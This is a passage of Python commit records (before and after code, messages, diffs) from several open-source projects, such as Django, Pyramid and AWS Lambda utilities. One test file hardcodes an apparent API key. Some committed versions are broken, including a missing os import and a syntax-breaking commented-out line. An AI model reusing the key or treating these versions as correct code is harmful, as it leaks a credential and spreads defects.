from decorator import decorator
from functools import wraps
from django.db.models import get_apps
from piston.utils import rc
from wapiti.conf import ID_RE
_RegisteredType = namedtuple('RegisteredType', ('api', ))
_registered_types = {}
def register(name, modelapi):
"""Register a model with the API"""
global _registered_types
if modelapi.__name__ in _registered_types:
return
if not modelapi.objects:
modelapi.objects = modelapi.model.objects
_registered_types[name] = _RegisteredType(api=modelapi)
def _api_method(f, *args, **kwargs):
return f(*args, **kwargs)
def api_method(f):
"""Decorator to declare a method api-accessible"""
f.api = True
return decorator(_api_method, f)
def _is_id(id):
return ID_RE.match(id)
def _register_models():
"""Find app api submodules and register models"""
for a in get_apps():
try:
_temp = __import__('.'.join(a.__name__.split('.')[:-1] + ['api']),
globals(), locals())
except ImportError:
pass
|
# Copyright (c) Ecometrica. All rights reserved.
# Distributed under the BSD license. See LICENSE for details.
from collections import namedtuple
from decorator import decorator
from functools import wraps
from django.db.models import get_apps
from piston.utils import rc
from wapiti.conf import ID_RE
_RegisteredType = namedtuple('RegisteredType', ('api', ))
_registered_types = {}
def register(name, modelapi):
"""Register a model with the API"""
global _registered_types
if modelapi.__name__ in _registered_types:
return
if not hasattr(modelapi, 'objects'):
modelapi.objects = modelapi.model.objects
_registered_types[name] = _RegisteredType(api=modelapi)
def _api_method(f, *args, **kwargs):
return f(*args, **kwargs)
def api_method(f):
"""Decorator to declare a method api-accessible"""
f.api = True
return decorator(_api_method, f)
def _is_id(id):
return ID_RE.match(id)
def _register_models():
"""Find app api submodules and register models"""
for a in get_apps():
try:
_temp = __import__('.'.join(a.__name__.split('.')[:-1] + ['api']),
globals(), locals())
except ImportError:
pass
|
Check for the existence of model.objects without calling it; may fix some weird buggy behaviour involving database migrations.
|
Check for the existence of model.objects without calling it; may fix some weird buggy behaviour involving database migrations.
|
Python
|
bsd-3-clause
|
ecometrica/django-wapiti
|
---
+++
@@ -18,7 +18,7 @@
global _registered_types
if modelapi.__name__ in _registered_types:
return
- if not modelapi.objects:
+ if not hasattr(modelapi, 'objects'):
modelapi.objects = modelapi.model.objects
_registered_types[name] = _RegisteredType(api=modelapi)
|
b2b1443753894ccb4835b8667b63d95ee7a1303f
|
Functions/echo-python/lambda_function.py
|
Functions/echo-python/lambda_function.py
|
"""Created By: Andrew Ryan DeFilippis"""
print('Lambda cold-start...')
from json import dumps, loads
def lambda_handler(event, context):
print('LOG RequestId: {}\tResponse:\n\n{}'.format(
context.aws_request_id,
dumps(event, indent=4)
))
return event
# Comment or remove everything below before deploying to Lambda.
def local_testing():
import context
with open('event.json', 'r') as f:
event = loads(f.read())
print("Event:\n\n{}\n\nFunction Output:\n".format(
dumps(
event,
indent=4
)
))
lambda_handler(event, context)
local_testing()
|
"""Created By: Andrew Ryan DeFilippis"""
print('Lambda cold-start...')
from json import dumps, loads
# Disable 'testing_locally' when deploying to AWS Lambda
testing_locally = False
verbose = False
class CWLogs(object):
def __init__(self, context):
self.context = context
def event(self, message, event_prefix='LOG'):
print('{} RequestId: {}\t{}'.format(
event_prefix,
self.context.aws_request_id,
message
))
def lambda_handler(event, context):
log = CWLogs(context)
if verbose is True:
log.event('Event: {}'.format(dumps(event)))
return event
def local_test():
import context
with open('event.json', 'r') as f:
event = loads(f.read())
print('\nFunction Log:\n')
lambda_handler(event, context)
if testing_locally is True:
local_test()
|
Update the echo Function to be similar to the template Function
|
Update the echo Function to be similar to the template Function
|
Python
|
apache-2.0
|
andrewdefilippis/aws-lambda
|
---
+++
@@ -5,30 +5,41 @@
from json import dumps, loads
+# Disable 'testing_locally' when deploying to AWS Lambda
+testing_locally = False
+verbose = False
+
+
+class CWLogs(object):
+ def __init__(self, context):
+ self.context = context
+
+ def event(self, message, event_prefix='LOG'):
+ print('{} RequestId: {}\t{}'.format(
+ event_prefix,
+ self.context.aws_request_id,
+ message
+ ))
+
+
def lambda_handler(event, context):
- print('LOG RequestId: {}\tResponse:\n\n{}'.format(
- context.aws_request_id,
- dumps(event, indent=4)
- ))
+ log = CWLogs(context)
+
+ if verbose is True:
+ log.event('Event: {}'.format(dumps(event)))
return event
-# Comment or remove everything below before deploying to Lambda.
-def local_testing():
+def local_test():
import context
with open('event.json', 'r') as f:
event = loads(f.read())
- print("Event:\n\n{}\n\nFunction Output:\n".format(
- dumps(
- event,
- indent=4
- )
- ))
+ print('\nFunction Log:\n')
lambda_handler(event, context)
-
-local_testing()
+if testing_locally is True:
+ local_test()
|
ff9049b23f12e67367798644eb3b5a8643ab7c31
|
wsgi_server.py
|
wsgi_server.py
|
from urlparse import parse_qs
import DQXUtils
import simplejson
import responders
def application(environ, start_response):
returndata = dict((k,v[0]) for k,v in parse_qs(environ['QUERY_STRING']).items())
request_type = returndata['datatype']
tm = DQXUtils.Timer()
try:
resp_func = getattr(responders, request_type)#Fetch the handfler by request type, using some introspection magic in responders/__init__.py
except AttributeError:
raise Exception("Unknown request {0}".format(request_type))
response = resp_func(returndata)
#todo: make the response handling part of the handler, to avoid this branching
#This will become necessary when we have more handlers with different response types (e.g. other downloads)
if request_type == "downloadtable":#Respond to a download request with a text attachment
status = '200 OK'
response_headers = [('Content-type', 'text/plain'),('Content-Disposition','attachment; filename=download.txt')]
start_response(status, response_headers)
for item in response:
yield item
else:#respond to any other event with json
response = simplejson.dumps(response)
status = '200 OK'
response_headers = [('Content-type', 'application/json'),
('Content-Length', str(len(response)))]
start_response(status, response_headers)
yield response
print('@@@@ Responded to {0} in {1}s'.format(request_type, tm.Elapsed()))
|
from urlparse import parse_qs
import DQXUtils
import simplejson
import responders
def application(environ, start_response):
returndata = dict((k,v[0]) for k,v in parse_qs(environ['QUERY_STRING']).items())
request_type = returndata['datatype']
tm = DQXUtils.Timer()
try:
resp_func = getattr(responders, request_type)#Fetch the handfler by request type, using some introspection magic in responders/__init__.py
except AttributeError:
raise Exception("Unknown request {0}".format(request_type))
response = resp_func(returndata)
#todo: make the response handling part of the handler, to avoid this branching
#This will become necessary when we have more handlers with different response types (e.g. other downloads)
if request_type == "downloadtable":#Respond to a download request with a text attachment
status = '200 OK'
response_headers = [('Content-type', 'text/plain'),('Content-Disposition','attachment; filename=download.txt')]
start_response(status, response_headers)
for item in response:
yield item
else:#respond to any other event with json
response = simplejson.dumps(response, use_decimal=True)
status = '200 OK'
response_headers = [('Content-type', 'application/json'),
('Content-Length', str(len(response)))]
start_response(status, response_headers)
yield response
print('@@@@ Responded to {0} in {1}s'.format(request_type, tm.Elapsed()))
|
Add use_decimal=True for json encoding
|
Add use_decimal=True for json encoding
|
Python
|
agpl-3.0
|
cggh/DQXServer
|
---
+++
@@ -24,7 +24,7 @@
for item in response:
yield item
else:#respond to any other event with json
- response = simplejson.dumps(response)
+ response = simplejson.dumps(response, use_decimal=True)
status = '200 OK'
response_headers = [('Content-type', 'application/json'),
('Content-Length', str(len(response)))]
|
cca6a727063c63d78d61ee81c892811238139462
|
lame_test.py
|
lame_test.py
|
# Just barely tests things to make sure they work
from uwaterlooapi import UWaterlooAPI; api = UWaterlooAPI(api_key='fda8e642f9c9480800e8c02896744288')
exclude = ['api_key', 'base_url']
for attr in dir(api):
if attr.startswith("_"): continue
if attr in exclude: continue
f = getattr(api, attr)
print attr
try:
f()
except TypeError:
f("query")
|
# Just barely tests things to make sure they work
import datetime
from uwaterlooapi import UWaterlooAPI; api = UWaterlooAPI(api_key='fda8e642f9c9480800e8c02896744288')
exclude = ['api_key', 'base_url']
dates = (datetime.datetime.now().year, datetime.datetime.now().date().isocalendar()[1])
args_map = {
'announcements_by_week': dates,
'menu_by_week': dates,
'notes_by_week': dates,
'course': ('CS', '486'),
'course_examschedule': ('CS', '486'),
'course_prerequistes': ('CS', '486'),
'course_schedule': ('CS', '486'),
'course_by_building_room': ('MC', '2038'),
'term_course_schedule': ('1141', 'CS', '486'),
'term_subject_schedule': ('1141', 'CS'),
}
for attr in dir(api):
if attr.startswith("_"): continue
if attr in exclude: continue
f = getattr(api, attr)
print(attr)
try:
f()
except TypeError:
try:
args = ("query",)
if attr in args_map:
args = args_map[attr]
f(*args)
except Exception as e:
print(e.message)
except Exception as e:
print(e.message)
|
Update lame test to test on multiple parameters.
|
Update lame test to test on multiple parameters.
|
Python
|
mit
|
albertoconnor/uwaterlooapi
|
---
+++
@@ -1,15 +1,41 @@
# Just barely tests things to make sure they work
+import datetime
from uwaterlooapi import UWaterlooAPI; api = UWaterlooAPI(api_key='fda8e642f9c9480800e8c02896744288')
exclude = ['api_key', 'base_url']
+
+dates = (datetime.datetime.now().year, datetime.datetime.now().date().isocalendar()[1])
+
+
+args_map = {
+ 'announcements_by_week': dates,
+ 'menu_by_week': dates,
+ 'notes_by_week': dates,
+ 'course': ('CS', '486'),
+ 'course_examschedule': ('CS', '486'),
+ 'course_prerequistes': ('CS', '486'),
+ 'course_schedule': ('CS', '486'),
+ 'course_by_building_room': ('MC', '2038'),
+ 'term_course_schedule': ('1141', 'CS', '486'),
+ 'term_subject_schedule': ('1141', 'CS'),
+}
+
for attr in dir(api):
if attr.startswith("_"): continue
if attr in exclude: continue
f = getattr(api, attr)
- print attr
+ print(attr)
try:
f()
except TypeError:
- f("query")
+ try:
+ args = ("query",)
+ if attr in args_map:
+ args = args_map[attr]
+ f(*args)
+ except Exception as e:
+ print(e.message)
+ except Exception as e:
+ print(e.message)
|
44e8f8db3e39d083de74e4534403e327cb5d389a
|
alexandria/__init__.py
|
alexandria/__init__.py
|
import logging
log = logging.getLogger(__name__)
from pyramid.config import Configurator
from sqlalchemy import engine_from_config
from .models import DBSession
required_settings = [
'pyramid.secret.session',
'pyramid.secret.auth',
]
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
config = Configurator(settings=settings)
do_start = True
for _req in required_settings:
if _req not in settings:
log.error('{} is not set in configuration file.'.format(_req))
do_start = False
if do_start is False:
log.error('Unable to start due to missing configuration')
exit(-1)
config.add_static_view('static', 'static', cache_max_age=3600)
|
import logging
log = logging.getLogger(__name__)
from pyramid.config import Configurator
from sqlalchemy import engine_from_config
from .models import DBSession
required_settings = [
'pyramid.secret.session',
'pyramid.secret.auth',
]
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
engine = engine_from_config(settings, 'sqlalchemy.')
DBSession.configure(bind=engine)
config = Configurator(settings=settings)
do_start = True
for _req in required_settings:
if _req not in settings:
log.error('{} is not set in configuration file.'.format(_req))
do_start = False
if do_start is False:
log.error('Unable to start due to missing configuration')
exit(-1)
# Include the transaction manager
config.include('pyramid_tm')
config.add_static_view('static', 'static', cache_max_age=3600)
|
Make sure to use the Pyramid transaction manager
|
Make sure to use the Pyramid transaction manager
|
Python
|
isc
|
cdunklau/alexandria,cdunklau/alexandria,bertjwregeer/alexandria,cdunklau/alexandria,bertjwregeer/alexandria
|
---
+++
@@ -29,6 +29,8 @@
log.error('Unable to start due to missing configuration')
exit(-1)
+ # Include the transaction manager
+ config.include('pyramid_tm')
config.add_static_view('static', 'static', cache_max_age=3600)
|
cc43b4f14706027c0bd0c15e1467d5df586faff8
|
shoop/front/apps/simple_order_notification/templates.py
|
shoop/front/apps/simple_order_notification/templates.py
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
MESSAGE_SUBJECT_TEMPLATE = "{{ order.shop }} - Order {{ order.identifier }} Received"
MESSAGE_BODY_TEMPLATE = """
Thank you for your order, {{ order.customer }}!
Your order has been received and will be processed as soon as possible.
For reference, here's a list of your order's contents.
{% for line in order.lines.all() %}
{%- if line.taxful_price %}
* {{ line.quantity }} x {{ line.text }} - {{ line.taxful_price|money }}
{% endif -%}
{%- endfor %}
Order Total: {{ order.taxful_total_price|money }}
{% if not order.is_paid() %}
Please note that no record of your order being paid currently exists.
{% endif %}
Thank you for shopping with us!
""".strip()
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
MESSAGE_SUBJECT_TEMPLATE = "{{ order.shop }} - Order {{ order.identifier }} Received"
MESSAGE_BODY_TEMPLATE = """
Thank you for your order, {{ order.customer }}!
Your order has been received and will be processed as soon as possible.
For reference, here's a list of your order's contents.
{% for line in order.lines.all() %}
* {{ line.quantity }} x {{ line.text }} - {{ line.taxful_price|money }}
{%- endfor %}
Order Total: {{ order.taxful_total_price|money }}
{% if not order.is_paid() %}
Please note that no record of your order being paid currently exists.
{% endif %}
Thank you for shopping with us!
""".strip()
|
Remove price check from order email template
|
Remove price check from order email template
For some reason, only lines with prices were rendered in the email. Changed
this so that the free lines (from campaigns) are shown also.
No ref
|
Python
|
agpl-3.0
|
shawnadelic/shuup,shawnadelic/shuup,suutari/shoop,suutari-ai/shoop,suutari/shoop,hrayr-artunyan/shuup,shoopio/shoop,suutari/shoop,shoopio/shoop,shoopio/shoop,suutari-ai/shoop,suutari-ai/shoop,hrayr-artunyan/shuup,hrayr-artunyan/shuup,shawnadelic/shuup
|
---
+++
@@ -15,9 +15,7 @@
For reference, here's a list of your order's contents.
{% for line in order.lines.all() %}
-{%- if line.taxful_price %}
* {{ line.quantity }} x {{ line.text }} - {{ line.taxful_price|money }}
-{% endif -%}
{%- endfor %}
Order Total: {{ order.taxful_total_price|money }}
|
c16e2fed1b64c2d875c99940912e2aa3e5d6c33f
|
polyaxon/auditor/service.py
|
polyaxon/auditor/service.py
|
import tracker
from auditor.manager import default_manager
from event_manager.event_service import EventService
class AuditorService(EventService):
"""An service that just passes the event to author services."""
event_manager = default_manager
def get_event(self, event_type, instance, **kwargs):
return {
'event_type': event_type,
'instance': instance,
'kwargs': kwargs
}
def record_event(self, event):
tracker.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
def setup(self):
# Load default event types
import auditor.events # noqa
|
import auditor
import tracker
from auditor.manager import default_manager
from event_manager.event_service import EventService
class AuditorService(EventService):
"""An service that just passes the event to author services."""
event_manager = default_manager
def get_event(self, event_type, instance, **kwargs):
return {
'event_type': event_type,
'instance': instance,
'kwargs': kwargs
}
def record_event(self, event):
tracker.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
auditor.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
def setup(self):
# Load default event types
import auditor.events # noqa
|
Add activity logs to auditor tracking
|
Add activity logs to auditor tracking
|
Python
|
apache-2.0
|
polyaxon/polyaxon,polyaxon/polyaxon,polyaxon/polyaxon
|
---
+++
@@ -1,3 +1,4 @@
+import auditor
import tracker
from auditor.manager import default_manager
@@ -20,6 +21,9 @@
tracker.record(event_type=event['event_type'],
instance=event['instance'],
**event['kwargs'])
+ auditor.record(event_type=event['event_type'],
+ instance=event['instance'],
+ **event['kwargs'])
def setup(self):
# Load default event types
|
61394aec9d2193a978a0754bb43f70d1f66262d4
|
django_json_widget/widgets.py
|
django_json_widget/widgets.py
|
import json
from builtins import super
from django import forms
from django.templatetags.static import static
class JSONEditorWidget(forms.Widget):
class Media:
css = {'all': (static('dist/jsoneditor.min.css'), )}
js = (static('dist/jsoneditor.min.js'),)
template_name = 'django_json_widget.html'
def __init__(self, attrs=None, mode='code', options=None, width=None, height=None):
default_options = {
'modes': ['text', 'code', 'tree', 'form', 'view'],
'mode': mode,
'search': True,
}
if options:
default_options.update(options)
self.options = default_options
self.width = width
self.height = height
super(JSONEditorWidget, self).__init__(attrs=attrs)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['options'] = json.dumps(self.options)
context['widget']['width'] = self.width
context['widget']['height'] = self.height
return context
|
import json
from builtins import super
from django import forms
class JSONEditorWidget(forms.Widget):
class Media:
css = {'all': ('dist/jsoneditor.min.css', )}
js = ('dist/jsoneditor.min.js',)
template_name = 'django_json_widget.html'
def __init__(self, attrs=None, mode='code', options=None, width=None, height=None):
default_options = {
'modes': ['text', 'code', 'tree', 'form', 'view'],
'mode': mode,
'search': True,
}
if options:
default_options.update(options)
self.options = default_options
self.width = width
self.height = height
super(JSONEditorWidget, self).__init__(attrs=attrs)
def get_context(self, name, value, attrs):
context = super().get_context(name, value, attrs)
context['widget']['options'] = json.dumps(self.options)
context['widget']['width'] = self.width
context['widget']['height'] = self.height
return context
|
Stop resolving paths to the static files.
|
Stop resolving paths to the static files.
Fixed #33
|
Python
|
mit
|
jmrivas86/django-json-widget,jmrivas86/django-json-widget
|
---
+++
@@ -2,13 +2,12 @@
from builtins import super
from django import forms
-from django.templatetags.static import static
class JSONEditorWidget(forms.Widget):
class Media:
- css = {'all': (static('dist/jsoneditor.min.css'), )}
- js = (static('dist/jsoneditor.min.js'),)
+ css = {'all': ('dist/jsoneditor.min.css', )}
+ js = ('dist/jsoneditor.min.js',)
template_name = 'django_json_widget.html'
|
d309fba3d07b3122bdb05d511968b53f1c59b357
|
opps/images/widgets.py
|
opps/images/widgets.py
|
from django import forms
from django.conf import settings
from django.template.loader import render_to_string
class MultipleUpload(forms.FileInput):
def render(self, name, value, attrs=None):
_value = ""
if value:
_value = "{0}{1}".format(settings.MEDIA_URL, value)
return render_to_string("admin/opps/images/multiupload.html",
{"name": name, "value": _value,
"STATIC_URL": settings.STATIC_URL})
class CropExample(forms.TextInput):
def render(self, name, value, attrs=None):
if u'http' not in value:
value = u"{}{}".format(settings.THUMBOR_MEDIA_URL, value)
return render_to_string(
"admin/opps/images/cropexample.html",
{"name": name, "value": value,
"THUMBOR_SERVER": settings.THUMBOR_SERVER,
"THUMBOR_MEDIA_URL": settings.THUMBOR_MEDIA_URL})
|
from django import forms
from django.conf import settings
from django.template.loader import render_to_string
class MultipleUpload(forms.FileInput):
def render(self, name, value, attrs=None):
_value = ""
if value:
_value = "{0}{1}".format(settings.MEDIA_URL, value)
return render_to_string("admin/opps/images/multiupload.html",
{"name": name, "value": _value,
"STATIC_URL": settings.STATIC_URL})
class CropExample(forms.TextInput):
def render(self, name, value, attrs=None):
return render_to_string(
"admin/opps/images/cropexample.html",
{"name": name, "value": value,
"THUMBOR_SERVER": settings.THUMBOR_SERVER,
"THUMBOR_MEDIA_URL": settings.THUMBOR_MEDIA_URL})
|
Fix bug on images widget CropExample
|
Fix bug on images widget CropExample
|
Python
|
mit
|
williamroot/opps,opps/opps,jeanmask/opps,YACOWS/opps,jeanmask/opps,YACOWS/opps,YACOWS/opps,williamroot/opps,opps/opps,opps/opps,williamroot/opps,williamroot/opps,jeanmask/opps,jeanmask/opps,opps/opps,YACOWS/opps
|
---
+++
@@ -4,7 +4,6 @@
class MultipleUpload(forms.FileInput):
-
def render(self, name, value, attrs=None):
_value = ""
if value:
@@ -15,10 +14,7 @@
class CropExample(forms.TextInput):
-
def render(self, name, value, attrs=None):
- if u'http' not in value:
- value = u"{}{}".format(settings.THUMBOR_MEDIA_URL, value)
return render_to_string(
"admin/opps/images/cropexample.html",
{"name": name, "value": value,
|
ccb9e3d0fca96b853cabe0c9569dda1414409618
|
enactiveagents/model/perceptionhandler.py
|
enactiveagents/model/perceptionhandler.py
|
"""
Module that holds classes that represent an agent's perception handler.
"""
import abc
import world
import structure
class PerceptionHandler(object):
"""
Abstract perception handler class.
"""
@abc.abstractmethod
def perceive(self, agent, world):
"""
Generates a percept given an agent and a world.
:param agent: The agent to generate the percept for.
:param world: The world to generate the percept for.
:return: The percept.
"""
raise NotImplementedError("Should be implemented by child")
class EmptyPerceptionHandler(PerceptionHandler):
"""
A trivial perception handler that never perceives anything.
"""
def perceive(self, agent, world):
return ""
class BasicPerceptionHandler(PerceptionHandler):
"""
A perception handler that perceives walls and blocks up to a given distance.
The perception indicates the type of structure that is seen, as well as its
distance.
"""
def perceive(self, agent_, world_):
for delta in range(0, 10):
pos = world.Position(agent_.get_position())
pos.add(agent_.get_move_delta(delta))
entities = world_.get_entities_at(pos)
for entity in entities:
if entity == agent_:
continue
if isinstance(entity, structure.Wall):
return "w%s" % delta
elif isinstance(entity, structure.Block):
return "b%s" % delta
elif isinstance(entity, structure.Food):
return "f%s" % delta
return ""
|
"""
Module that holds classes that represent an agent's perception handler.
"""
import abc
import world
import agent
import structure
class PerceptionHandler(object):
"""
Abstract perception handler class.
"""
@abc.abstractmethod
def perceive(self, agent, world):
"""
Generates a percept given an agent and a world.
:param agent: The agent to generate the percept for.
:param world: The world to generate the percept for.
:return: The percept.
"""
raise NotImplementedError("Should be implemented by child")
class EmptyPerceptionHandler(PerceptionHandler):
"""
A trivial perception handler that never perceives anything.
"""
def perceive(self, agent, world):
return ""
class BasicPerceptionHandler(PerceptionHandler):
"""
A perception handler that perceives walls and blocks up to a given distance.
The perception indicates the type of structure that is seen, as well as its
distance.
"""
def perceive(self, agent_, world_):
for delta in range(0, 10):
pos = world.Position(agent_.get_position())
pos.add(agent_.get_move_delta(delta))
entities = world_.get_entities_at(pos)
for entity in entities:
if entity == agent_:
continue
if isinstance(entity, agent.Agent):
return "a%s" % delta
elif isinstance(entity, structure.Wall):
return "w%s" % delta
elif isinstance(entity, structure.Block):
return "b%s" % delta
elif isinstance(entity, structure.Food):
return "f%s" % delta
return ""
|
Make agents able to see each other.
|
Make agents able to see each other.
|
Python
|
mit
|
Beskhue/enactive-agents,Beskhue/enactive-agents,Beskhue/enactive-agents
|
---
+++
@@ -4,6 +4,7 @@
import abc
import world
+import agent
import structure
class PerceptionHandler(object):
@@ -47,7 +48,9 @@
for entity in entities:
if entity == agent_:
continue
- if isinstance(entity, structure.Wall):
+ if isinstance(entity, agent.Agent):
+ return "a%s" % delta
+ elif isinstance(entity, structure.Wall):
return "w%s" % delta
elif isinstance(entity, structure.Block):
return "b%s" % delta
|
061872f2a89656250a1de32338663ebd6900b602
|
scripts/filter-pyvcf.py
|
scripts/filter-pyvcf.py
|
import sys
from vcf import Reader
import gzip
vcf = Reader(open(sys.argv[1], 'r'))
n = 0
for v in vcf:
if len(v.ALT) > 1: continue
if v.QUAL < 20: continue
if v.aaf[0] > 0.05: continue
n += 1
print(n)
|
import sys
from vcf import Reader
import gzip
vcf = Reader(open(sys.argv[1], 'rb'))
n = 0
for v in vcf:
if len(v.ALT) > 1: continue
if v.QUAL < 20: continue
if v.aaf[0] > 0.05: continue
n += 1
print(n)
|
Fix error while running compare.sh
|
Fix error while running compare.sh
bash compare.sh
#pyvcf
Traceback (most recent call last):
File "filter-pyvcf.py", line 5, in <module>
vcf = Reader(open(sys.argv[1], 'rt'))
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/site-packages/vcf/parser.py", line 300, in __init__
self._parse_metainfo()
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/site-packages/vcf/parser.py", line 317, in _parse_metainfo
line = next(self.reader)
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/site-packages/vcf/parser.py", line 280, in <genexpr>
self.reader = (line.strip() for line in self._reader if line.strip())
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 642, in __next__
line = self.readline()
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 555, in readline
data = self.read(readsize, firstline=True)
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 495, in read
newdata = self.stream.read(size)
File "/usr/lib/python3.5/gzip.py", line 274, in read
return self._buffer.read(size)
File "/usr/lib/python3.5/_compression.py", line 68, in readinto
data = self.read(len(byte_view))
File "/usr/lib/python3.5/gzip.py", line 461, in read
if not self._read_gzip_header():
File "/usr/lib/python3.5/gzip.py", line 404, in _read_gzip_header
magic = self._fp.read(2)
File "/usr/lib/python3.5/gzip.py", line 91, in read
self.file.read(size-self._length+read)
File "/home/raony/.virtualenvs/cuvcf2/lib/python3.5/codecs.py", line 321, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0x8b in position 1: invalid start byte
real 0m0.085s
user 0m0.072s
sys 0m0.012s
|
Python
|
mit
|
brentp/cyvcf2,brentp/cyvcf2,brentp/cyvcf2
|
---
+++
@@ -2,7 +2,7 @@
from vcf import Reader
import gzip
-vcf = Reader(open(sys.argv[1], 'r'))
+vcf = Reader(open(sys.argv[1], 'rb'))
n = 0
for v in vcf:
|
2c83c171a8594f708e3a12c0435c7d0aa20d68ad
|
scripts/iface-choice.py
|
scripts/iface-choice.py
|
#apt-get install python-pip
#pip install netifaces
import netifaces
def select_iface(iface):
try:
iface = int(iface)
if(iface < 0):
raise IndexError
return netifaces.interfaces()[iface]
except IndexError:
print "Number provided was too big or small"
return []
except ValueError:
print "Please enter an interface number"
return []
print "Please choose a network interface to run the honeypot on:\r\n"
i = 0
for ifaces in netifaces.interfaces():
print "\t[",i,"]",ifaces,"(",netifaces.ifaddresses(ifaces)[netifaces.AF_INET],")"
i = i+1
print "\r\n"
found = []
while(not found):
found=select_iface(raw_input('Chosen interface: '))
print found
|
#apt-get install python-pip
#pip install netifaces
import netifaces
def select_iface(iface):
try:
iface = int(iface)
if(iface < 0):
raise IndexError
return netifaces.interfaces()[iface]
except IndexError:
print "Number provided was too big or small"
return []
except ValueError:
print "Please enter an interface number"
return []
print "Please choose a network interface to run the honeypot on:\r\n"
i = 0
for ifaces in netifaces.interfaces():
print "\t[",i,"]",ifaces,"(",netifaces.ifaddresses(ifaces)[netifaces.AF_INET],")"
i = i+1
print "\r\n"
found = []
while(not found):
found=select_iface(raw_input('Chosen interface: '))
f = open(os.path.expanduser('~/.honey_iface'), 'w')
f.write(found)
|
Write iface choice to file
|
Write iface choice to file
This seems unnecessary but I can't see a way to pass a string back from python, because of the prompt.
|
Python
|
mit
|
andrewmichaelsmith/manuka,g1eagle/E-Pot
|
---
+++
@@ -19,7 +19,6 @@
print "Please choose a network interface to run the honeypot on:\r\n"
i = 0
-
for ifaces in netifaces.interfaces():
print "\t[",i,"]",ifaces,"(",netifaces.ifaddresses(ifaces)[netifaces.AF_INET],")"
i = i+1
@@ -30,4 +29,8 @@
while(not found):
found=select_iface(raw_input('Chosen interface: '))
-print found
+f = open(os.path.expanduser('~/.honey_iface'), 'w')
+f.write(found)
+
+
+
|
45a319f4bf4ae310a2299b58cf8a3f907fdb7f3c
|
receipt_tracker/urls.py
|
receipt_tracker/urls.py
|
"""receipt_tracker URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.contrib import admin
from receipt_tracker import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('core.urls')),
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
"""receipt_tracker URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.contrib import admin
from receipt_tracker import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('core.urls')),
]
#urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
Disable static to get something running
|
Disable static to get something running
|
Python
|
agpl-3.0
|
openreceipts/openreceipts-server,openreceipts/openreceipts-server,openreceipts/openreceipts-server
|
---
+++
@@ -24,5 +24,5 @@
url(r'^', include('core.urls')),
]
-urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
+#urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
|
0c2374c11c83c10fc67fd283abf699d7becb4311
|
app/event/erase_basic/step_settings.py
|
app/event/erase_basic/step_settings.py
|
step = {
'@type': {
'type': 'string',
'allowed': ['Zero', 'Random'],
'required': True
},
'success': {
'type': 'boolean',
'required': True
},
'startingTime': {
'type': 'datetime'
},
'endingTime': {
'type': 'datetime'
}
}
|
step = {
'@type': {
'type': 'string',
'allowed': ['Zeros', 'Random'],
'required': True
},
'success': {
'type': 'boolean',
'required': True
},
'startingTime': {
'type': 'datetime'
},
'endingTime': {
'type': 'datetime'
}
}
|
Change EraseBasic's step type from 'Zero' to 'Zeros'
|
Change EraseBasic's step type from 'Zero' to 'Zeros'
|
Python
|
agpl-3.0
|
eReuse/DeviceHub,eReuse/DeviceHub
|
---
+++
@@ -1,7 +1,7 @@
step = {
'@type': {
'type': 'string',
- 'allowed': ['Zero', 'Random'],
+ 'allowed': ['Zeros', 'Random'],
'required': True
},
'success': {
|
02a95bafbcf739cef6306cdd0d785743f2dd7370
|
saleor/product/management/commands/populatedb.py
|
saleor/product/management/commands/populatedb.py
|
from django.core.management.base import BaseCommand
from django.db import IntegrityError
from utils.create_random_data import create_items, create_users, create_orders
from saleor.userprofile.models import User
class Command(BaseCommand):
help = 'Populate database with test objects'
